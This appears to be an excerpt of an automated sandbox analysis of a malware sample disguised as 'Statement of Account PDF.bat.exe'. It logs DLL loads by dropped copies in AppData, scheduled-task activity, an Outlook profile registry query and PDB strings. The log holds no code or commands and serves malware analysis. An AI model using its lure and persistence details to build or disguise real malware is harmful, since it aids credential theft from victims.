                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Statement of Account PDF.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Statement of Account PDF.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Statement of Account PDF.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Data.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Accessibility.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbu source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Configuration.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: UbK.pdb source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe.0.dr, BjTxJte.exe.8.dr, WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdbMZ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: System.Core.pdbMZ@ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: System.Xml.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Core.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Drawing.pdbt source: WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbMZ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: Accessibility.pdbSystem.ni.dllSystem.Core.dll4 source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: mscorlib.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Drawing.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: UbK.pdbSHA256 source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe.0.dr, BjTxJte.exe.8.dr
                      Source: Binary string: System.Core.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdb4 source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: Accessibility.pdbMZ source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
